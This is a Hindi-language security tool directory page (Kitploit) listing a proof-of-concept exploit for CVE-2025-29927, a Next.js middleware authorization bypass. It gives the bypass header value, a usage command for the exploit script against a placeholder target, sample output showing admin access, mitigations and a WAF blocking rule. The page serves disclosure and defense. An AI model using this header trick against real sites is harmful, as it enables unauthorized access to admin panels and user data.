Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29927-PoC — यहाँ CVE-2025-29927 के लिए एक सरल लेकिन प्रभावी एक्सप्लॉइट दिया गया है। | Kitploit
उपकरण/GitHubGitHub/w2hcorp/cve-2025-29927-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubw2hcorp/cve-2025-29927-poc

CVE-2025-29927-PoC

यहाँ CVE-2025-29927 के लिए एक सरल लेकिन प्रभावी एक्सप्लॉइट दिया गया है।

रिपॉजिटरी देखें
1131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927 - Next.js मिडलवेयर प्राधिकरण बाईपास (PoC)

इस रिपॉजिटरी में CVE-2025-29927 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो Next.js में एक गंभीर कमजोरी है जो हमलावरों को मिडलवेयर-विशिष्ट HTTP हेडर का दुरुपयोग करके प्राधिकरण जाँच को बायपास करने की अनुमति देती है।


अवलोकन

फ़ील्डमान
CVE IDCVE-2025-29927
गंभीरतागंभीर (CVSS 9.1)
प्रभावित फ्रेमवर्कNext.js
कमजोरी का प्रकारप्राधिकरण बाईपास
शोषण वेक्टरHTTP अनुरोध हेडर
शोषण जटिलतानिम्न
प्रमाणीकरण आवश्यकनहीं

कमजोरी के बारे में

Next.js एप्लिकेशन अक्सर प्राधिकरण और पहुँच नियंत्रण के लिए मिडलवेयर पर निर्भर करते हैं। यह CVE x-middleware-subrequest हेडर के प्रसंस्करण में एक तर्क दोष से उत्पन्न होता है। जब यह हेडर middleware पर सेट होता है, तो सर्वर गलती से मान सकता है कि अनुरोध आंतरिक तर्क से उत्पन्न हुआ है और मिडलवेयर-आधारित प्रमाणीकरण को बायपास कर सकता है।

यह हमलावरों को बिना किसी क्रेडेंशियल या वैध सत्र के एडमिन पैनल, संरक्षित API या उपयोगकर्ता डेटा तक पहुँचने की अनुमति दे सकता है।


PoC एक्सप्लॉइट

हम यह जाँचने के लिए एक सरल Python स्क्रिप्ट प्रदान करते हैं कि कोई Next.js एप्लिकेशन कमजोर है या नहीं।

▶️ उपयोग

root@kitploit:~
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]

नमूना आउटपुट

root@kitploit:~
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...

निर्भरताएँ

  • Python 3.6+
  • requests लाइब्रेरी

शमन

  • Next.js के नवीनतम पैच किए गए संस्करण में अपग्रेड करें।
  • x-middleware-subrequest को विश्वास संकेत के रूप में उपयोग करने से बचें।
  • सर्वर-साइड सत्र सत्यापन और संरक्षित रूट्स में उचित प्राधिकरण जाँच लागू करें।
  • इस हेडर के संदिग्ध उपयोग को ब्लॉक या फ़्लैग करने के लिए WAF/IDS नियम जोड़ने पर विचार करें।

WAF लॉजिक:

root@kitploit:~
if header 'x-middleware-subrequest' == 'middleware':
    block_request()

प्रकटीकरण और श्रेय

यह PoC हमारे निरंतर कमजोरी अनुसंधान प्रयासों के भाग के रूप में W2H Corp. की आक्रामक सुरक्षा टीम द्वारा विकसित किया गया था। CVE स्पष्टीकरण के लिए मूल पोस्ट यहाँ उपलब्ध है।

टूल डाउनलोड करें